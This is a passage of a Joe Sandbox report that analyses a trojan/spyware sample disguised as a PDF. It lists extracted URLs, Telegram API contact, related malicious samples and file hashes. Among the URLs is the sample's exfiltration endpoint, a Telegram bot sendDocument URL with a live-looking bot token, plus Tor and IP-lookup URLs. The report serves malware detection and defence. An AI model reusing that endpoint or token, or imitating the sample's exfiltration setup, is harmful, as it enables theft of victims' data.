00000001.00000003.286611235.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285434027.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.287159497.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.286188290.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285233567.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285483737.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284391361.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.286700925.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284980871.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284169771.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284313551.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285598966.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284902558.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.286321696.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285564698.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.287504784.000000000575B000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.typography.netD20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.founder.com.cn/cn/cThe20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.galapagosdesign.com/staff/dennis.htm20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://fontfabrik.com20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.comgrita20220114080343434.pdf.exe, 00000001.00000003.296414694.0000000005747000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000002.308506043.0000000005740000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.296538249.0000000005747000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.founder.com.cn/cnl-g20220114080343434.pdf.exe, 00000001.00000003.286031416.0000000005747000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://api.telegram.org4RegSvcs.exe, 00000009.00000002.558653484.00000000034A5000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://api.telegram.org/bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendDocumentdocument-----RegSvcs.exe, 00000009.00000002.558108982.0000000003141000.00000004.00000001.sdmpfalse
                                      high
                                      http://www.founder.com.cn/cnu20220114080343434.pdf.exe, 00000001.00000003.285876732.0000000005747000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.galapagosdesign.com/DPlease20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.comtto20220114080343434.pdf.exe, 00000001.00000003.291433983.000000000574E000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://api.ipify.org%GETMozilla/5.0RegSvcs.exe, 00000009.00000002.558108982.0000000003141000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      low
                                      http://www.fonts.com20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpfalse
                                        high
                                        http://www.sandoll.co.kr20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://api.telegram.org/bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/20220114080343434.pdf.exe, 00000001.00000002.306687989.00000000038B9000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000002.306874211.0000000003A0F000.00000004.00000001.sdmp, RegSvcs.exe, 00000009.00000000.304424534.0000000000402000.00000040.00000001.sdmp, RegSvcs.exe, 00000009.00000000.303119673.0000000000402000.00000040.00000001.sdmpfalse
                                          high
                                          http://www.urwpp.deDPlease20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.jiyu-kobo.co.jp//ft20220114080343434.pdf.exe, 00000001.00000003.288192818.000000000574D000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.288316807.000000000574D000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.287443277.000000000574B000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.zhongyicts.com.cn20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000009.00000002.558653484.00000000034A5000.00000004.00000001.sdmpfalse
                                            high
                                            http://www.sakkal.com20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.comtoTF20220114080343434.pdf.exe, 00000001.00000003.291433983.000000000574E000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.291333441.000000000574C000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.292482669.000000000574C000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip20220114080343434.pdf.exe, 00000001.00000002.306687989.00000000038B9000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000002.306874211.0000000003A0F000.00000004.00000001.sdmp, RegSvcs.exe, 00000009.00000000.304424534.0000000000402000.00000040.00000001.sdmp, RegSvcs.exe, 00000009.00000000.303119673.0000000000402000.00000040.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.sakkal.comrmx20220114080343434.pdf.exe, 00000001.00000003.288389703.0000000005774000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.288343797.0000000005774000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.288218703.0000000005774000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.288177309.0000000005774000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.288293221.0000000005774000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.apache.org/licenses/LICENSE-2.020220114080343434.pdf.exe, 00000001.00000003.286721278.0000000005747000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.286779303.0000000005747000.00000004.00000001.sdmpfalse
                                              high
                                              http://www.fontbureau.com20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpfalse
                                                high
                                                http://DynDns.comDynDNSRegSvcs.exe, 00000009.00000002.558108982.0000000003141000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.fontbureau.comF20220114080343434.pdf.exe, 00000001.00000003.296024006.0000000005747000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.296414694.0000000005747000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.296538249.0000000005747000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://mVBubsTSBV2T9Joj.orgRegSvcs.exe, 00000009.00000002.558108982.0000000003141000.00000004.00000001.sdmp, RegSvcs.exe, 00000009.00000002.558692920.00000000034B8000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://mVBubsTSBV2T9Joj.org(RegSvcs.exe, 00000009.00000002.558108982.0000000003141000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                low
                                                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haRegSvcs.exe, 00000009.00000002.558108982.0000000003141000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.founder.com.cn/cnres20220114080343434.pdf.exe, 00000001.00000003.285978096.0000000005748000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.fontbureau.comdf20220114080343434.pdf.exe, 00000001.00000003.291064337.000000000574D000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.sakkal.com-iX20220114080343434.pdf.exe, 00000001.00000003.288177309.0000000005774000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://en.wikipedia20220114080343434.pdf.exe, 00000001.00000003.283895234.0000000005763000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.283933561.0000000005763000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.fontbureau.comtuet:20220114080343434.pdf.exe, 00000001.00000003.291064337.000000000574D000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.291333441.000000000574C000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.291019852.000000000574C000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.jiyu-kobo.co.jp/jp/20220114080343434.pdf.exe, 00000001.00000003.288192818.000000000574D000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.288316807.000000000574D000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.fontbureau.comd20220114080343434.pdf.exe, 00000001.00000003.291433983.000000000574E000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.291064337.000000000574D000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.291333441.000000000574C000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.291019852.000000000574C000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.founder.com.cn/cncr;20220114080343434.pdf.exe, 00000001.00000003.285978096.0000000005748000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://api.ipify.org%$RegSvcs.exe, 00000009.00000002.558108982.0000000003141000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                low
                                                http://www.carterandcone.coml20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.fontbureau.com/designers/cabarga.htmlN20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.founder.com.cn/cn20220114080343434.pdf.exe, 00000001.00000003.285876732.0000000005747000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285978096.0000000005748000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.286031416.0000000005747000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.com/designers/frere-jones.html20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://www.jiyu-kobo.co.jp/jp/#20220114080343434.pdf.exe, 00000001.00000003.288192818.000000000574D000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.288316807.000000000574D000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.com/designers/cabarga.html20220114080343434.pdf.exe, 00000001.00000003.291064337.000000000574D000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://www.jiyu-kobo.co.jp/o20220114080343434.pdf.exe, 00000001.00000003.288192818.000000000574D000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.288316807.000000000574D000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.jiyu-kobo.co.jp/20220114080343434.pdf.exe, 00000001.00000003.288192818.000000000574D000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.288316807.000000000574D000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.287443277.000000000574B000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.fontbureau.como20220114080343434.pdf.exe, 00000001.00000003.296414694.0000000005747000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000002.308506043.0000000005740000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.296538249.0000000005747000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.fontbureau.com/designers820220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://api.telegram.orgRegSvcs.exe, 00000009.00000002.558692920.00000000034B8000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://www.founder.com.cn/cnu-h20220114080343434.pdf.exe, 00000001.00000003.286031416.0000000005747000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.fontbureau.comrsivo20220114080343434.pdf.exe, 00000001.00000003.296024006.0000000005747000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.296414694.0000000005747000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000002.308506043.0000000005740000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.296538249.0000000005747000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.jiyu-kobo.co.jp/oby20220114080343434.pdf.exe, 00000001.00000003.287443277.000000000574B000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown

                                                          Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          149.154.167.220
                                                          api.telegram.orgUnited Kingdom
                                                          62041TELEGRAMRUfalse

                                                          General Information

                                                          Joe Sandbox Version:34.0.0 Boulder Opal
                                                          Analysis ID:553186
                                                          Start date:14.01.2022
                                                          Start time:12:59:46
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 9m 25s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Sample file name:20220114080343434.pdf.exe
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                          Number of analysed new started processes analysed:24
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@3/1@1/1
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HDC Information:Failed
                                                          HCA Information:
                                                          • Successful, ratio: 100%
                                                          • Number of executed functions: 50
                                                          • Number of non-executed functions: 6
                                                          Cookbook Comments:
                                                          • Adjust boot time
                                                          • Enable AMSI
                                                          • Found application associated with file extension: .exe
                                                          Warnings:
                                                          Show All
                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                          • Excluded IPs from analysis (whitelisted): 23.203.70.208, 20.49.150.241, 23.35.237.194
                                                          • Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, client.wns.windows.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, storeedgefd.dsx.mp.microsoft.com.edgekey.net, arc.msn.com, storeedgefd.xbetservices.akadns.net, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, e11290.dspg.akamaiedge.net, go.microsoft.com, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, displaycatalog.mp.microsoft.com, e16646.dscg.akamaiedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, storeedgefd.dsx.mp.microsoft.com
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          13:00:47API Interceptor1x Sleep call for process: 20220114080343434.pdf.exe modified
                                                          13:01:00API Interceptor731x Sleep call for process: RegSvcs.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          149.154.167.220K5CrmTWqYm.exeGet hashmaliciousBrowse
                                                            lJFlbD0vMzZDdIO.exeGet hashmaliciousBrowse
                                                              ai4kogd3SP.exeGet hashmaliciousBrowse
                                                                Trainer v5.1.1.exeGet hashmaliciousBrowse
                                                                  AWB INVOICE.exeGet hashmaliciousBrowse
                                                                    Amended Copy of Invoice.exeGet hashmaliciousBrowse
                                                                      tivDpdRokf.exeGet hashmaliciousBrowse
                                                                        DHL Shipping doc.exeGet hashmaliciousBrowse
                                                                          payment.exeGet hashmaliciousBrowse
                                                                            Munish Chaudhary - Procurement Division.exeGet hashmaliciousBrowse
                                                                              Shipping Doc.exeGet hashmaliciousBrowse
                                                                                L9sruKoGsQ.exeGet hashmaliciousBrowse
                                                                                  Three.exeGet hashmaliciousBrowse
                                                                                    KRAKEN.exeGet hashmaliciousBrowse
                                                                                      Fiyat Talebi 2022.01.12.exeGet hashmaliciousBrowse
                                                                                        QbmHheKRGM.exeGet hashmaliciousBrowse
                                                                                          Z9dbLkBVl6.exeGet hashmaliciousBrowse
                                                                                            payment advise.exeGet hashmaliciousBrowse
                                                                                              New_Order.exeGet hashmaliciousBrowse
                                                                                                Earings.exeGet hashmaliciousBrowse

                                                                                                  Domains

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                  api.telegram.orgK5CrmTWqYm.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  #NEW ORDER FOR JANUARY 2022.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  PwlvCShFVJ.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  lJFlbD0vMzZDdIO.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  zo1zCvVfYM.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  ai4kogd3SP.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Trainer v5.1.1.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  AWB INVOICE.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Amended Copy of Invoice.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  tivDpdRokf.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  DHL Shipping doc.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  payment.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Munish Chaudhary - Procurement Division.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Shipping Doc.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  L9sruKoGsQ.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Three.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  eWZLusfgI7.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  KRAKEN.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Fiyat Talebi 2022.01.12.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  QbmHheKRGM.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220

                                                                                                  ASN

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                  TELEGRAMRUK5CrmTWqYm.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  lJFlbD0vMzZDdIO.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  ai4kogd3SP.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Trainer v5.1.1.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  AWB INVOICE.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Amended Copy of Invoice.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  tivDpdRokf.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  DHL Shipping doc.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  payment.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Munish Chaudhary - Procurement Division.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Shipping Doc.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  L9sruKoGsQ.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Three.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  KRAKEN.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Fiyat Talebi 2022.01.12.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  QbmHheKRGM.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Z9dbLkBVl6.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  payment advise.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  New_Order.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Earings.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220

                                                                                                  JA3 Fingerprints

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                  3b5074b1b5d032e5620f69f9f700ff0eVisual CertExam Suite_3.0.1.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  PYD04k22Hf.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  20145639704.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  BzYdfSiOVH.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  oyNoKMONxj.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  bf89b4a3ed5662649d245f4e21ec171f8c7c14b415604.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  inMail 30575 Onesourcescreening.htmlGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  7wvFbzoGf4.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Amended Copy of Invoice.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  tivDpdRokf.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  DHL Shipping doc.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  payment.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Munish Chaudhary - Procurement Division.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Shipping Doc.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  brwncald.com-e-FAX-50145-pdf.htmGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  eq3_new_purchase_order_1642002549.xls.htmGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  UX7Kty3cwt.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Three.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  SecuriteInfo.com.Program.Unwanted.3981.14233.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  #Ud83d#Udce9 - mark.robins - Details.pdf.htmGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220

                                                                                                  Dropped Files

                                                                                                  No context

                                                                                                  Created / dropped Files

                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\20220114080343434.pdf.exe.log
                                                                                                  Process:C:\Users\user\Desktop\20220114080343434.pdf.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1310
                                                                                                  Entropy (8bit):5.345651901398759
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x847mE4P:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzQ
                                                                                                  MD5:A9EFF9253CAF99EC8665E41D736DDAED
                                                                                                  SHA1:D95BB4ABC856D774DA4602A59DE252B4BF560530
                                                                                                  SHA-256:DBC637B33F1F3CD1AB40AFED23F94C4571CA43621EBB52C5DC267DBDC52D4783
                                                                                                  SHA-512:96B67A84B750589BDB758224641065919F34BBF02BB286B9F5D566B48965A0E38FB88308B61351A6E11C46B76BFEC370FBC8B978A9F0F07A847567172D5CA5F3
                                                                                                  Malicious:true
                                                                                                  Reputation:moderate, very likely benign file
                                                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                                                                  Static File Info

                                                                                                  General

                                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Entropy (8bit):7.224593030373487
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                                  File name:20220114080343434.pdf.exe
                                                                                                  File size:589824
                                                                                                  MD5:cd9290d22bb18ced32a1b81814888382
                                                                                                  SHA1:83b1ce896dca71d611232fe4197cbe3993cccf64
                                                                                                  SHA256:3876b600bafaaaf0a580e3925b9851c1c82ea16b40fb6b2b127296a523cf86fd
                                                                                                  SHA512:1c2c1b126910aad08d6434ed65c49d10e24c3fa79463ec7829ebc6dc4f3601020edaa0d07e7a60c12faec39c557ae4ecafe5804ac324231ff8cf3f4d8d8e7b23
                                                                                                  SSDEEP:12288:SccK777777777777N7cPGR72wUjuf/R9nkIE9NciKpSj1kv6e:CK777777777777lcudvUjuX7S+8kv
                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5O.a............................>.... ... ....@.. .......................`............@................................

                                                                                                  File Icon

                                                                                                  Icon Hash:00828e8e8686b000

